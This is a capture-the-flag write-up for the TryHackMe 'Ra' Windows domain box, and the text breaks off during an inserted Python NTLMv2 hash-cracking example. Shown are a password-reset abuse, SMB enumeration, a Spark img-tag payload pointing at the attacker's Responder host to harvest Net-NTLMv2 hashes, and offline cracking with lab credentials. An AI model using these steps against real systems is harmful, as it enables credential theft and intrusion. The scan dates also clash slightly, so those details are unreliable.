TryHackMe Ra Writeup

Shivam Taneja
19 min read · Nov 8, 2022

Ra Walkthrough

Overview

This Windows box involves a lot of enumeration. It starts with resetting an account through the poorly implemented password-reset function on the web server. With that account we enumerate SMB and find installers for Spark 2.8.3, which is vulnerable to CVE-2020-12772: a chat message containing an image tag makes the recipient's client fetch the image from our server and authenticate to it, leaking a Net-NTLMv2 hash for a user on the box. We crack it, and that user turns out to be a member of the Account Operators group. A PowerShell script runs automatically every few minutes and reads a file owned by another user, so we reset that user's password, overwrite the file with a payload that adds a new domain user and puts it in the Administrators group, and then log in as the new user with psexec or Evil-WinRM.

Enumeration

Nmap Scan

# Nmap 7.80 scan initiated Oct 14 20:13:25 2022 as: nmap -p- --min-rate 10000 -T4 -sC -sV -v -Pn -oN nmap-scan 10.10.226.131
Nmap scan report for 10.10.226.131
Host is up (0.16s latency).
Not shown: 65500 filtered ports
PORT      STATE SERVICE             VERSION
53/tcp    open  domain?
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
80/tcp    open  http                Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Windcorp.
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2020-11-14 14:44:27Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-methods:
|_  Supported Methods: OPTIONS
| http-ntlm-info:
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|_  Product_Version: 10.0.17763
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
| ssl-cert: Subject: commonName=Windows Admin Center
| Subject Alternative Name: DNS:WIN-2FAA40QQ70B
| Issuer: commonName=Windows Admin Center
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha512WithRSAEncryption
| Not valid before: 2020-04-30T14:41:03
| Not valid after:  2020-06-30T14:41:02
| MD5:   31ef ecc2 3c93 81b1 67cf 3015 a99f 1726
|_SHA-1: ef2b ac66 5e99 dae7 1182 73a1 93e8 a0b7 c772 f49c
|_ssl-date: 2020-11-14T14:47:28+00:00; +30s from scanner time.
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ldapssl?
2179/tcp  open  vmrdp?
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: windcorp.thm0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl?
3389/tcp  open  ms-wbt-server       Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: WINDCORP
|   NetBIOS_Domain_Name: WINDCORP
|   NetBIOS_Computer_Name: FIRE
|   DNS_Domain_Name: windcorp.thm
|   DNS_Computer_Name: Fire.windcorp.thm
|   DNS_Tree_Name: windcorp.thm
|   Product_Version: 10.0.17763
|_  System_Time: 2020-11-14T14:46:51+00:00
| ssl-cert: Subject: commonName=Fire.windcorp.thm
| Issuer: commonName=Fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-11-13T14:23:32
| Not valid after:  2021-05-15T14:23:32
| MD5:   6807 9b9e 1b7c 5868 04d2 2c76 0cff d0f3
|_SHA-1: 0120 f2b6 78c5 cd14 1f35 edb9 3f5d 853a 9c78 788b
|_ssl-date: 2020-11-14T14:47:29+00:00; +31s from scanner time.
5222/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|
|     errors:
|       invalid-namespace
|       (timeout)
|     compression_methods:
|
|     capabilities:
|
|     xmpp:
|       version: 1.0
|     auth_mechanisms:
|
|     stream_id: 8m9lbpgdkf
|_    unknown:
5223/tcp  open  ssl/hpvirtgrp?
5229/tcp  open  jaxflow?
5262/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|
|     errors:
|       invalid-namespace
|       (timeout)
|     compression_methods:
|
|     capabilities:
|
|     xmpp:
|       version: 1.0
|     auth_mechanisms:
|
|     stream_id: 1d9uzzborg
|_    unknown:
5263/tcp  open  ssl/unknown
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|
|     errors:
|       (timeout)
|     compression_methods:
|
|     xmpp:
|
|     auth_mechanisms:
|
|     capabilities:
|_    unknown:
5270/tcp  open  ssl/xmp?
5275/tcp  open  jabber              Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|
|     errors:
|       invalid-namespace
|       (timeout)
|     compression_methods:
|
|     capabilities:
|
|     xmpp:
|       version: 1.0
|     auth_mechanisms:
|
|     stream_id: 936v5nk59h
|_    unknown:
5276/tcp  open  ssl/unknown
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  http                Jetty 9.4.18.v20190429
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
7443/tcp  open  ssl/http            Jetty 9.4.18.v20190429
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Jetty(9.4.18.v20190429)
|_http-title: Openfire HTTP Binding Service
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
7777/tcp  open  socks5              (No authentication; connection failed)
| socks-auth-info:
|_  No authentication
9090/tcp  open  zeus-admin?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:26 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:34 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   JavaRMI, drda, ibm-db2-das, informix:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   SqueezeCenter_CLI:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   WMSRequest:
|     HTTP/1.1 400 Illegal character CNTL=0x1
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x1</pre>
9091/tcp  open  ssl/xmltec-xmlmail?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:47 GMT
|     Last-Modified: Fri, 31 Jan 2020 17:54:10 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 115
|     <html>
|     <head><title></title>
|     <meta http-equiv="refresh" content="0;URL=index.jsp">
|     </head>
|     <body>
|     </body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Sat, 14 Nov 2020 14:44:47 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 400 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
| ssl-cert: Subject: commonName=fire.windcorp.thm
| Subject Alternative Name: DNS:fire.windcorp.thm, DNS:*.fire.windcorp.thm
| Issuer: commonName=fire.windcorp.thm
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-05-01T08:39:00
| Not valid after:  2025-04-30T08:39:00
| MD5:   b715 5425 83f3 a20f 75c8 ca2d 3353 cbb7
|_SHA-1: 97f7 0772 a26b e324 7ed5 bbcb 5f35 7d74 7982 66ae
9389/tcp  open  mc-nmf              .NET Message Framing
49670/tcp open  msrpc               Microsoft Windows RPC
49675/tcp open  msrpc               Microsoft Windows RPC
49700/tcp open  msrpc               Microsoft Windows RPC
49892/tcp open  msrpc               Microsoft Windows RPC

Host script results:
|_clock-skew: mean: 30s, deviation: 0s, median: 30s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-11-14T14:46:53
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 14 20:23:10 2020 -- 1 IP address (1 host up) scanned in 584.63 seconds

From the nmap scan we learn the DNS domain name windcorp.thm, and the ssl-cert script leaks the hostname fire.windcorp.thm. Add both to /etc/hosts. Worth noting for later: SMB signing is enabled and required, so relaying any captured NTLM authentication to this host's SMB service is off the table; cracking offline is the realistic option.

Port 80

We see a Reset Password button, which asks for the username and the answer to one of four security questions:

On the main page we find a list of the staff with their usernames.

Let’s create a username list.

organicfish718
organicwolf509
tinywolf424
angrybird253
buse
Edeltraut
Edward
Emile
brownostrich284
sadswan869
whiteleopard529
happymeercat399
orangegorilla428

There is an "Employees in Focus" section, and the file names of the pictures reveal the name of Lily Levesque's pet. That is one of the security questions, so we can use the reset function on her account: the username is lilyle and the pet's name is Sparky. The reset page hands us a new password for lilyle, which is the one used in the commands below.

Enumerating SMB

Let's look at the SMB shares and the password policy. Checking the policy before any brute-forcing matters: if an account lockout policy is set, a password spray can lock out accounts, which is not what we want.

┌──(h4ck3r㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234'  --shares
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\lilyle:ChangeMe#1234
SMB         10.10.226.131   445    FIRE             [+] Enumerated shares
SMB         10.10.226.131   445    FIRE             Share           Permissions     Remark
SMB         10.10.226.131   445    FIRE             -----           -----------     ------
SMB         10.10.226.131   445    FIRE             ADMIN$                          Remote Admin
SMB         10.10.226.131   445    FIRE             C$                              Default share
SMB         10.10.226.131   445    FIRE             IPC$            READ            Remote IPC
SMB         10.10.226.131   445    FIRE             NETLOGON        READ            Logon server share
SMB         10.10.226.131   445    FIRE             Shared          READ
SMB         10.10.226.131   445    FIRE             SYSVOL          READ            Logon server share
SMB         10.10.226.131   445    FIRE             Users           READ

┌──(h4ck3r㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ crackmapexec smb windcorp.thm -u lilyle -p 'ChangeMe#1234'  --pass-pol
SMB         10.10.226.131   445    FIRE             [*] Windows 10.0 Build 17763 (name:FIRE) (domain:windcorp.thm) (signing:True) (SMBv1:False)
SMB         10.10.226.131   445    FIRE             [+] windcorp.thm\lilyle:ChangeMe#1234
SMB         10.10.226.131   445    FIRE             [+] Dumping password info for domain: WINDCORP
SMB         10.10.226.131   445    FIRE             Minimum password length: 7
SMB         10.10.226.131   445    FIRE             Password history length: 24
SMB         10.10.226.131   445    FIRE             Maximum password age:
SMB         10.10.226.131   445    FIRE
SMB         10.10.226.131   445    FIRE             Password Complexity Flags: 010001
SMB         10.10.226.131   445    FIRE                 Domain Refuse Password Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password Store Cleartext: 1
SMB         10.10.226.131   445    FIRE                 Domain Password Lockout Admins: 0
SMB         10.10.226.131   445    FIRE                 Domain Password No Clear Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password No Anon Change: 0
SMB         10.10.226.131   445    FIRE                 Domain Password Complex: 1
SMB         10.10.226.131   445    FIRE
SMB         10.10.226.131   445    FIRE             Minimum password age:
SMB         10.10.226.131   445    FIRE             Reset Account Lockout Counter: 2 minutes
SMB         10.10.226.131   445    FIRE             Locked Account Duration: 2 minutes
SMB         10.10.226.131   445    FIRE             Account Lockout Threshold: 5
SMB         10.10.226.131   445    FIRE             Forced Log off Time: Not Set

According to the password policy the lockout threshold is 5: five wrong passwords for one user lock that account for the Locked Account Duration, 2 minutes here, and the bad-password counter only resets 2 minutes after the last failure. So let's avoid brute-forcing SMB and instead explore the shares that lilyle can reach.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbmap -u 'lilyle' -p 'ChangeMe#1234'  -H windcorp.thm  -r
[+] IP: windcorp.thm:445        Name: unknown
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    InitShutdown
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    lsass
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    ntsvcs
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    scerpc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-244-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    epmapper
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-2b8-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    LSM_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    eventlog
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-530-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    atsvc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-734-0
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-340-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-340-1
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    RpcProxy\49674
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    1fa260e57b61ac4e
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    RpcProxy\593
        fr--r--r--                4 Mon Jan  1 05:53:28 1601    srvsvc
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    spoolss
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-964-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    netdfs
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    ROUTER
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    W32TIME_ALT
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-32c-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498373871065180.4064.DefaultAppDomain.powershell
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-cd0-0
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    TermSrv_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    Ctx_WinStation_API_service
        fr--r--r--                3 Mon Jan  1 05:53:28 1601    SessEnvPublicRpc
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-16fc-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498373859437939.3600.DefaultAppDomain.sme
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    PSHost.132498374391876309.3004.DefaultAppDomain.powershell
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    Winsock2\CatalogChangeListener-cb0-0
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    iisipmff316478-5d8e-4104-a522-2909c9a54989
        fr--r--r--                1 Mon Jan  1 05:53:28 1601    iislogpipeadb9a285-0017-403b-b5a4-8dbfb24435c9
        NETLOGON                                                READ ONLY       Logon server share
        .\NETLOGON\*
        dr--r--r--                0 Sat May  2 15:32:19 2020    .
        dr--r--r--                0 Sat May  2 15:32:19 2020    ..
        Shared                                                  READ ONLY
        .\Shared\*
        dr--r--r--                0 Sat May 30 06:15:42 2020    .
        dr--r--r--                0 Sat May 30 06:15:42 2020    ..
        fr--r--r--               45 Fri May  1 21:02:36 2020    Flag 1.txt
        fr--r--r--         29526628 Sat May 30 06:15:01 2020    spark_2_8_3.deb
        fr--r--r--         99555201 Sun May  3 16:38:39 2020    spark_2_8_3.dmg
        fr--r--r--         78765568 Sun May  3 16:38:39 2020    spark_2_8_3.exe
        fr--r--r--        123216290 Sun May  3 16:38:39 2020    spark_2_8_3.tar.gz
        SYSVOL                                                  READ ONLY       Logon server share
        .\SYSVOL\*
        dr--r--r--                0 Sat May  2 15:32:20 2020    .
        dr--r--r--                0 Sat May  2 15:32:20 2020    ..
        dr--r--r--                0 Sat May  2 15:32:20 2020    NRznLVEcPj
        dr--r--r--                0 Thu Apr 30 20:41:10 2020    windcorp.thm
        Users                                                   READ ONLY
        .\Users\*
        dw--w--w--                0 Sun May  3 03:35:58 2020    .
        dw--w--w--                0 Sun May  3 03:35:58 2020    ..
        dr--r--r--                0 Sun May 10 16:48:11 2020    Administrator
        dr--r--r--                0 Fri May  1 06:03:55 2020    All Users
        dr--r--r--                0 Fri May  1 18:39:44 2020    angrybird
        dr--r--r--                0 Fri May  1 18:39:34 2020    berg
        dr--r--r--                0 Fri May  1 18:39:22 2020    bluefrog579
        dr--r--r--                0 Sun May  3 19:00:02 2020    brittanycr
        dr--r--r--                0 Fri May  1 18:39:08 2020    brownostrich284
        dr--r--r--                0 Sat Nov 14 19:55:12 2020    buse
        dw--w--w--                0 Fri May  1 05:05:11 2020    Default
        dr--r--r--                0 Fri May  1 06:03:55 2020    Default User
        fr--r--r--              174 Fri May  1 06:01:55 2020    desktop.ini
        dr--r--r--                0 Fri May  1 18:38:54 2020    edward
        dr--r--r--                0 Sun May  3 05:00:16 2020    freddy
        dr--r--r--                0 Fri May  1 18:38:28 2020    garys
        dr--r--r--                0 Sat Nov 14 22:21:05 2020    goldencat416
        dr--r--r--                0 Fri May  1 18:38:17 2020    goldenwol
        dr--r--r--                0 Fri May  1 18:38:06 2020    happ
        dr--r--r--                0 Fri May  1 18:37:53 2020    happyme
        dr--r--r--                0 Fri May  1 18:37:42 2020    Luis
        dr--r--r--                0 Fri May  1 18:37:31 2020    orga
        dr--r--r--                0 Fri May  1 18:37:19 2020    organicf
        dr--r--r--                0 Sat Nov 14 22:21:59 2020    organicfish718
        dr--r--r--                0 Fri May  1 18:37:06 2020    pete
        dw--w--w--                0 Thu Apr 30 20:05:47 2020    Public
        dr--r--r--                0 Fri May  1 18:36:54 2020    purplecat
        dr--r--r--                0 Fri May  1 18:36:42 2020    purplepanda
        dr--r--r--                0 Fri May  1 18:36:31 2020    sadswan
        dr--r--r--                0 Sat Nov 14 22:17:23 2020    sadswan869
        dr--r--r--                0 Fri May  1 18:36:20 2020    sheela
        dr--r--r--                0 Fri May  1 18:35:39 2020    silver
        dr--r--r--                0 Fri May  1 18:35:24 2020    smallf
        dr--r--r--                0 Fri May  1 18:35:05 2020    spiff
        dr--r--r--                0 Fri May  1 18:34:49 2020    tinygoos
        dr--r--r--                0 Fri May  1 18:33:57 2020    whiteleopard

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ smbclient -U lilyle  //windcorp.thm/Shared
Enter WORKGROUP\lilyle's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 30 06:15:42 2020
  ..                                  D        0  Sat May 30 06:15:42 2020
  Flag 1.txt                          A       45  Fri May  1 21:02:36 2020
  spark_2_8_3.deb                     A 29526628  Sat May 30 06:15:01 2020
  spark_2_8_3.dmg                     A 99555201  Sun May  3 16:36:58 2020
  spark_2_8_3.exe                     A 78765568  Sun May  3 16:35:56 2020
  spark_2_8_3.tar.gz                  A 123216290  Sun May  3 16:37:24 2020

                15587583 blocks of size 4096. 10895808 blocks available
smb: \> get "Flag 1.txt"
getting file \Flag 1.txt of size 45 as Flag 1.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ cat 'Flag 1.txt'
THM{466d52dc75******************************}

The Shared share also holds installers for Spark 2.8.3 for several platforms (.deb, .dmg, .exe, .tar.gz), and a quick search shows that this version is vulnerable to CVE-2020-12772. I grab the .deb from the share so I can run the same client the staff are using.

On reading about CVE-2020-12772 I found a GitHub repository that was, as it happens, created by the makers of this machine. According to it, we can send a chat message containing an img tag to another Spark user; each time that user clicks the link, or the ROAR plugin preloads the image automatically, the external server receives the request for the image together with an NTLM authentication from the user viewing it, i.e. the user we are chatting with.

As explained in the repository, we run Responder as that external server and send a message with an img tag pointing at it; Responder should then capture the Net-NTLMv2 hash of whichever user renders the message.

We already have a username list, so we can send the payload "<img src=http://yourtun0IP/a.png>" to each user in turn and watch Responder to see whether any of them triggers a capture.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ sudo responder -I tun0
[sudo] password for sid:
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.0.2.0

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.82.29]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...

[HTTP] NTLMv2 Client   : 10.10.226.131
[HTTP] NTLMv2 Username : WINDCORP\buse
[HTTP] NTLMv2 Hash     : buse::WINDCORP:581eb034fb28c39c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kipping previously captured hash for WINDCORP\buse

What Responder captured is a Net-NTLMv2 challenge/response, not the NT hash itself: it cannot be used for pass-the-hash, and with SMB signing required on the target it cannot be relayed either, but it can be cracked offline. Let's crack it with John the Ripper.

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ echo "buse::WINDCORP:581eb034fb28c39c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hash

┌──(sid㉿kali)-[~/Documents/flags/tryhackme/ra]
└─$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
uzunLM+3131      (buse)
1g 0:00:00:02 DONE (2020-11-14 23:27) 0.3355g/s 993073p/s 993073c/s 993073C/s v0yage..uya051
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
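To make clear what Responder actually captured and what john's netntlmv2 mode does with it, here is an added Python example (mine, not from the writeup or the room) that computes a Net-NTLMv2 response from a password, emits it in the user::DOMAIN:challenge:NTProofStr:blob line format Responder prints, and cracks that line against a wordlist the same way john does: recompute the proof for each candidate and compare. The capture is constructed: only the server challenge is the one shown above, while the client nonce, timestamp and AV pairs in the blob are made up. MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import struct
from typing import Optional

MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320. An NT hash is MD4 of the UTF-16LE password."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):   # round 1: F(b,c,d), words in order
            t = a + ((b & c) | (~b & d)) + x[i]
            a, b, c, d = d, _rotl(t & MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):   # round 2: G (majority), words 0,4,8,12,1,5,...
            t = a + ((b & c) | (b & d) | (c & d)) + x[(i % 4) * 4 + i // 4] + 0x5A827999
            a, b, c, d = d, _rotl(t & MASK, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):   # round 3: H (xor), words 0,8,4,12,2,10,...
            t = a + (b ^ c ^ d) + x[int(f"{i:04b}"[::-1], 2)] + 0x6ED9EBA1
            a, b, c, d = d, _rotl(t & MASK, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & MASK, (b + bb) & MASK, (c + cc) & MASK, (d + dd) & MASK
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16-le"))


def ntlmv2_proof(password: str, user: str, domain: str,
                 server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(key, server_challenge || blob) where
    key = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))."""
    key = hmac.new(nt_hash(password),
                   (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def make_blob(client_nonce: bytes, filetime: int, nb_domain: str, nb_host: str) -> bytes:
    """NTLMv2_CLIENT_CHALLENGE ('blob'): version, timestamp, client nonce, AV pairs."""
    av = b""
    for av_id, value in ((2, nb_domain), (1, nb_host)):   # MsvAvNbDomainName, MsvAvNbComputerName
        enc = value.encode("utf-16-le")
        av += struct.pack("<HH", av_id, len(enc)) + enc
    av += struct.pack("<HH", 0, 0)                         # MsvAvEOL
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", filetime)
            + client_nonce + b"\x00" * 4 + av + b"\x00" * 4)


def responder_line(user: str, domain: str, server_challenge: bytes,
                   proof: bytes, blob: bytes) -> str:
    """The line Responder prints and john's netntlmv2 format consumes."""
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack(line: str, wordlist) -> Optional[str]:
    """Recompute NTProofStr for each candidate; a match is the password."""
    user, _, domain, chal, proof, blob = line.split(":")
    chal_b, proof_b, blob_b = bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)
    for candidate in wordlist:
        if hmac.compare_digest(ntlmv2_proof(candidate, user, domain, chal_b, blob_b), proof_b):
            return candidate
    return None


def sample_capture(password: str = "uzunLM+3131") -> str:
    """Constructed capture for buse: real server challenge from above, made-up blob."""
    server_challenge = bytes.fromhex("581eb034fb28c39c")
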